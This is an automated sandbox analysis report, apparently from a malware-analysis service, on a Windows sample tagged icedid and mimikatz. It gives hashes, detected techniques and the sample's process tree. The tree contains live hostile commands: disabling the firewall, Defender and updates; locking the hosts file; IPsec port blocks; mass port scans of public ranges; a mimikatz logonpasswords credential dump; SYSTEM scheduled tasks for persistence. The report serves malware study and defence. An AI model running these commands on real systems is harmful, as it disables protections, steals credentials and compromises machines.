Analysis
-
max time kernel
150s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
-
submitted
11-10-2024 15:22
General
-
Target
2024-10-11_52b5ed19d56d4eb4222b9776cf075e2c_hacktools_icedid_mimikatz.exe
-
Size
8.1MB
-
MD5
52b5ed19d56d4eb4222b9776cf075e2c
-
SHA1
294c0ae9262b18aec7a9675c93da7ad8f653f7f9
-
SHA256
c298f1346443c5b86e278ac712a29d804b8b882cea2c81c4e62c04eb67dfac41
-
SHA512
f83b43c23f805f2adfdea60d2827ac08a88d61d280c3b388b286864978968876394491663d6c1a372cbbdb32956521823ad99f5c8d39df9131c38bb256e51996
-
SSDEEP
98304:YmBtyYXmknGzZr+HdO5SEPFtmOZ9G1Md5v/nZVnivsAl0eXTBJYa5roSCaa:I6mknGzwHdOgEPHd9BbX/nivPlTXTYr
Malware Config
Signatures
-
Disables service(s) 3 TTPs
-
Mimikatz
mimikatz is an open source tool to dump credentials on Windows.
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
-
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
-
Contacts a large (30691) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
OS Credential Dumping: LSASS Memory 1 TTPs
Malicious access to Credentials History.
-
XMRig Miner payload 12 IoCs
-
mimikatz is an open source tool to dump credentials on Windows 5 IoCs
-
Drops file in Drivers directory 3 IoCs
-
Event Triggered Execution: Image File Execution Options Injection 1 TTPs 40 IoCs
-
Modifies Windows Firewall 2 TTPs 2 IoCs
-
Executes dropped EXE 26 IoCs
-
Loads dropped DLL 12 IoCs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Network Share Discovery 1 TTPs
Attempt to gather information on host network.
-
Creates a Windows Service
-
Drops file in System32 directory 18 IoCs
-
UPX packed file 34 IoCs
Detects executables packed with UPX/modified UPX open source packer.
-
Drops file in Program Files directory 3 IoCs
-
Drops file in Windows directory 60 IoCs
-
Launches sc.exe 4 IoCs
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 51 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
-
System Location Discovery: System Language Discovery 1 TTPs 64 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
-
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
-
NSIS installer 3 IoCs
-
Modifies data under HKEY_USERS 39 IoCs
-
Modifies registry class 14 IoCs
-
Runs net.exe
-
Runs ping.exe 1 TTPs 1 IoCs
-
Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: LoadsDriver 15 IoCs
-
Suspicious behavior: RenamesItself 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 21 IoCs
-
Suspicious use of SetWindowsHookEx 12 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵
-
C:\Windows\TEMP\heglkltzt\cllalu.exe"C:\Windows\TEMP\heglkltzt\cllalu.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Users\Admin\AppData\Local\Temp\2024-10-11_52b5ed19d56d4eb4222b9776cf075e2c_hacktools_icedid_mimikatz.exe"C:\Users\Admin\AppData\Local\Temp\2024-10-11_52b5ed19d56d4eb4222b9776cf075e2c_hacktools_icedid_mimikatz.exe"1⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: RenamesItself
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.execmd /c ping 127.0.0.1 -n 5 & Start C:\Windows\izvjmbrb\mwebabk.exe2⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 53⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
-
-
C:\Windows\izvjmbrb\mwebabk.exeC:\Windows\izvjmbrb\mwebabk.exe3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
-
-
C:\Windows\izvjmbrb\mwebabk.exeC:\Windows\izvjmbrb\mwebabk.exe1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Event Triggered Execution: Image File Execution Options Injection
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D users3⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D administrators3⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM3⤵
-
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static del all2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add policy name=Bastards description=FuckingBastards2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filteraction name=BastardsList action=block2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\vtecbbeeu\vltbqcbqt\wpcap.exe /S2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\vtecbbeeu\vltbqcbqt\wpcap.exeC:\Windows\vtecbbeeu\vltbqcbqt\wpcap.exe /S3⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net.exenet stop "Boundary Meter"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "Boundary Meter"5⤵
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\net.exenet stop "TrueSight Meter"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "TrueSight Meter"5⤵
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\net.exenet stop npf4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop npf5⤵
-
-
-
C:\Windows\SysWOW64\net.exenet start npf4⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf5⤵
- System Location Discovery: System Language Discovery
-
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net start npf2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\net.exenet start npf3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf4⤵
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net start npf2⤵
-
C:\Windows\SysWOW64\net.exenet start npf3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf4⤵
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\vtecbbeeu\vltbqcbqt\enbltlpnr.exe -p 80 222.186.128.1-222.186.255.255 --rate=512 -oJ C:\Windows\vtecbbeeu\vltbqcbqt\Scant.txt2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\vtecbbeeu\vltbqcbqt\enbltlpnr.exeC:\Windows\vtecbbeeu\vltbqcbqt\enbltlpnr.exe -p 80 222.186.128.1-222.186.255.255 --rate=512 -oJ C:\Windows\vtecbbeeu\vltbqcbqt\Scant.txt3⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\vtecbbeeu\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit >> C:\Windows\vtecbbeeu\Corporate\log.txt2⤵
- Drops file in Windows directory
-
C:\Windows\vtecbbeeu\Corporate\vfshost.exeC:\Windows\vtecbbeeu\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "bkvcanvad" /ru system /tr "cmd /c C:\Windows\ime\mwebabk.exe"2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "bkvcanvad" /ru system /tr "cmd /c C:\Windows\ime\mwebabk.exe"3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "wcbaitbbb" /ru system /tr "cmd /c echo Y|cacls C:\Windows\izvjmbrb\mwebabk.exe /p everyone:F"2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "wcbaitbbb" /ru system /tr "cmd /c echo Y|cacls C:\Windows\izvjmbrb\mwebabk.exe /p everyone:F"3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "gwenlyqcd" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\heglkltzt\cllalu.exe /p everyone:F"2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "gwenlyqcd" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\heglkltzt\cllalu.exe /p everyone:F"3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
-
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=TCP2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=UDP2⤵
- Event Triggered Execution: Netsh Helper DLL
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Bastards assign=y2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=TCP2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=UDP2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Bastards assign=y2⤵
- Event Triggered Execution: Netsh Helper DLL
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=TCP2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=UDP2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Bastards assign=y2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\cmd.execmd /c net stop SharedAccess2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\net.exenet stop SharedAccess3⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SharedAccess4⤵
- System Location Discovery: System Language Discovery
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c netsh firewall set opmode mode=disable2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\netsh.exenetsh firewall set opmode mode=disable3⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c netsh Advfirewall set allprofiles state off2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\netsh.exenetsh Advfirewall set allprofiles state off3⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net stop MpsSvc2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\net.exenet stop MpsSvc3⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MpsSvc4⤵
- System Location Discovery: System Language Discovery
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net stop WinDefend2⤵
-
C:\Windows\SysWOW64\net.exenet stop WinDefend3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop WinDefend4⤵
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net stop wuauserv2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\net.exenet stop wuauserv3⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop wuauserv4⤵
- System Location Discovery: System Language Discovery
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c sc config MpsSvc start= disabled2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\sc.exesc config MpsSvc start= disabled3⤵
- Launches sc.exe
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c sc config SharedAccess start= disabled2⤵
-
C:\Windows\SysWOW64\sc.exesc config SharedAccess start= disabled3⤵
- Launches sc.exe
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c sc config WinDefend start= disabled2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\sc.exesc config WinDefend start= disabled3⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c sc config wuauserv start= disabled2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\sc.exesc config wuauserv start= disabled3⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\TEMP\xohudmc.exeC:\Windows\TEMP\xohudmc.exe2⤵
- Executes dropped EXE
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
-
-
C:\Windows\TEMP\vtecbbeeu\tzntbfcjz.exeC:\Windows\TEMP\vtecbbeeu\tzntbfcjz.exe -accepteula -mp 796 C:\Windows\TEMP\vtecbbeeu\796.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\vtecbbeeu\tzntbfcjz.exeC:\Windows\TEMP\vtecbbeeu\tzntbfcjz.exe -accepteula -mp 64 C:\Windows\TEMP\vtecbbeeu\64.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\vtecbbeeu\tzntbfcjz.exeC:\Windows\TEMP\vtecbbeeu\tzntbfcjz.exe -accepteula -mp 2152 C:\Windows\TEMP\vtecbbeeu\2152.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\vtecbbeeu\tzntbfcjz.exeC:\Windows\TEMP\vtecbbeeu\tzntbfcjz.exe -accepteula -mp 2656 C:\Windows\TEMP\vtecbbeeu\2656.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\vtecbbeeu\tzntbfcjz.exeC:\Windows\TEMP\vtecbbeeu\tzntbfcjz.exe -accepteula -mp 2788 C:\Windows\TEMP\vtecbbeeu\2788.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\vtecbbeeu\tzntbfcjz.exeC:\Windows\TEMP\vtecbbeeu\tzntbfcjz.exe -accepteula -mp 2844 C:\Windows\TEMP\vtecbbeeu\2844.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\vtecbbeeu\tzntbfcjz.exeC:\Windows\TEMP\vtecbbeeu\tzntbfcjz.exe -accepteula -mp 3112 C:\Windows\TEMP\vtecbbeeu\3112.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\vtecbbeeu\tzntbfcjz.exeC:\Windows\TEMP\vtecbbeeu\tzntbfcjz.exe -accepteula -mp 3852 C:\Windows\TEMP\vtecbbeeu\3852.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\vtecbbeeu\tzntbfcjz.exeC:\Windows\TEMP\vtecbbeeu\tzntbfcjz.exe -accepteula -mp 3956 C:\Windows\TEMP\vtecbbeeu\3956.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\vtecbbeeu\tzntbfcjz.exeC:\Windows\TEMP\vtecbbeeu\tzntbfcjz.exe -accepteula -mp 4020 C:\Windows\TEMP\vtecbbeeu\4020.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\vtecbbeeu\tzntbfcjz.exeC:\Windows\TEMP\vtecbbeeu\tzntbfcjz.exe -accepteula -mp 1260 C:\Windows\TEMP\vtecbbeeu\1260.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\vtecbbeeu\tzntbfcjz.exeC:\Windows\TEMP\vtecbbeeu\tzntbfcjz.exe -accepteula -mp 3704 C:\Windows\TEMP\vtecbbeeu\3704.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\vtecbbeeu\tzntbfcjz.exeC:\Windows\TEMP\vtecbbeeu\tzntbfcjz.exe -accepteula -mp 956 C:\Windows\TEMP\vtecbbeeu\956.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\vtecbbeeu\tzntbfcjz.exeC:\Windows\TEMP\vtecbbeeu\tzntbfcjz.exe -accepteula -mp 948 C:\Windows\TEMP\vtecbbeeu\948.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\TEMP\vtecbbeeu\tzntbfcjz.exeC:\Windows\TEMP\vtecbbeeu\tzntbfcjz.exe -accepteula -mp 1324 C:\Windows\TEMP\vtecbbeeu\1324.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c C:\Windows\vtecbbeeu\vltbqcbqt\scan.bat2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\vtecbbeeu\vltbqcbqt\qnbbltzyb.exeqnbbltzyb.exe TCP 138.199.0.1 138.199.255.255 7001 512 /save3⤵
- Executes dropped EXE
- Drops file in Windows directory
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D users3⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D administrators3⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM3⤵
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\umqeiy.exeC:\Windows\SysWOW64\umqeiy.exe1⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding1⤵
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\izvjmbrb\mwebabk.exe /p everyone:F1⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"2⤵
-
-
C:\Windows\system32\cacls.execacls C:\Windows\izvjmbrb\mwebabk.exe /p everyone:F2⤵
-
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\TEMP\heglkltzt\cllalu.exe /p everyone:F1⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"2⤵
-
-
C:\Windows\system32\cacls.execacls C:\Windows\TEMP\heglkltzt\cllalu.exe /p everyone:F2⤵
-
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c C:\Windows\ime\mwebabk.exe1⤵
-
C:\Windows\ime\mwebabk.exeC:\Windows\ime\mwebabk.exe2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding1⤵
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\izvjmbrb\mwebabk.exe /p everyone:F1⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"2⤵
-
-
C:\Windows\system32\cacls.execacls C:\Windows\izvjmbrb\mwebabk.exe /p everyone:F2⤵
-
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\TEMP\heglkltzt\cllalu.exe /p everyone:F1⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"2⤵
-
-
C:\Windows\system32\cacls.execacls C:\Windows\TEMP\heglkltzt\cllalu.exe /p everyone:F2⤵
-
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c C:\Windows\ime\mwebabk.exe1⤵
-
C:\Windows\ime\mwebabk.exeC:\Windows\ime\mwebabk.exe2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
Network
MITRE ATT&CK Enterprise v15
Execution
Scheduled Task/Job
1Scheduled Task
1System Services
1Service Execution
1Persistence
Create or Modify System Process
2Windows Service
2Event Triggered Execution
2Image File Execution Options Injection
1Netsh Helper DLL
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Create or Modify System Process
2Windows Service
2Event Triggered Execution
2Image File Execution Options Injection
1Netsh Helper DLL
1Scheduled Task/Job
1Scheduled Task
1Discovery
Network Service Discovery
2Network Share Discovery
1Query Registry
1Remote System Discovery
1System Information Discovery
1System Location Discovery
1System Language Discovery
1System Network Configuration Discovery
1Internet Connection Discovery
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
95KB
MD586316be34481c1ed5b792169312673fd
SHA16ccde3a8c76879e49b34e4abb3b8dfaf7a9d77b5
SHA25649656c178b17198470ad6906e9ee0865f16f01c1dbbf11c613b55a07246a7918
SHA5123a6e77c39942b89f3f149e9527ab8a9eb39f55ac18a9db3a3922dfb294beb0760d10ca12be0e3a3854ff7dabbe2df18c52e3696874623a2a9c5dc74b29a860bc
-
Filesize
275KB
MD54633b298d57014627831ccac89a2c50b
SHA1e5f449766722c5c25fa02b065d22a854b6a32a5b
SHA256b967e4dce952f9232592e4c1753516081438702a53424005642700522055dbc9
SHA51229590fa5f72e6a36f2b72fc2a2cca35ee41554e13c9995198e740608975621142395d4b2e057db4314edf95520fd32aae8db066444d8d8db0fd06c391111c6d3
-
Filesize
693B
MD5f2d396833af4aea7b9afde89593ca56e
SHA108d8f699040d3ca94e9d46fc400e3feb4a18b96b
SHA256d6ae7c6275b7a9b81ae4a4662c9704f7a68d5943fcc4b8d035e53db708659b34
SHA5122f359d080c113d58a67f08cb44d9ab84b0dfd7392d6ddb56ca5d1b0e8aa37b984fac720e4373d4f23db967a3465fcf93cee66d7934d4211a22e1ebc640755f01
-
Filesize
43.8MB
MD591c42f5f768272cae482a98c730cbdb4
SHA1a93b05f3293dd795b5efa87b4cd90eaa27e3d1d5
SHA256cff3b095bf779ccefd2a51331cebe0f31a61702f98fab42308eaf00bc5a0d332
SHA51244bf3c169418cc7e2a38fc81e011571d28db5fb75b00714ad033d5a7e4917efac788ec309eb1b65e7de3cef17a34d396d5ef2277ac66eb24792090e2e1c4e88e
-
Filesize
4.2MB
MD5c9a162416bd3197e3d4765b646874cca
SHA19163aad34a39db3caaa365aa2dc86f32ad56af81
SHA256e8b2649dc072649a52c930e4c97d26c668bbc57026d0e2ec524019e6d7e22d43
SHA51270192fdae6c0f0285aa0d9357bb207b745800c741cba023ca5f75849c94d043bc681dfb3930a40dfc8444fcb02b8eb1513a0b6a3753b33e1dab057baf05ea158
-
Filesize
3.8MB
MD55daaf8c621a004ac504b46701fbb23d4
SHA171a22e43c8661b34cead478bc62fabf326bffe40
SHA256c717cda2273084ef8111a016b1910c37b98b70bd44b50906257f8ed4476bacdf
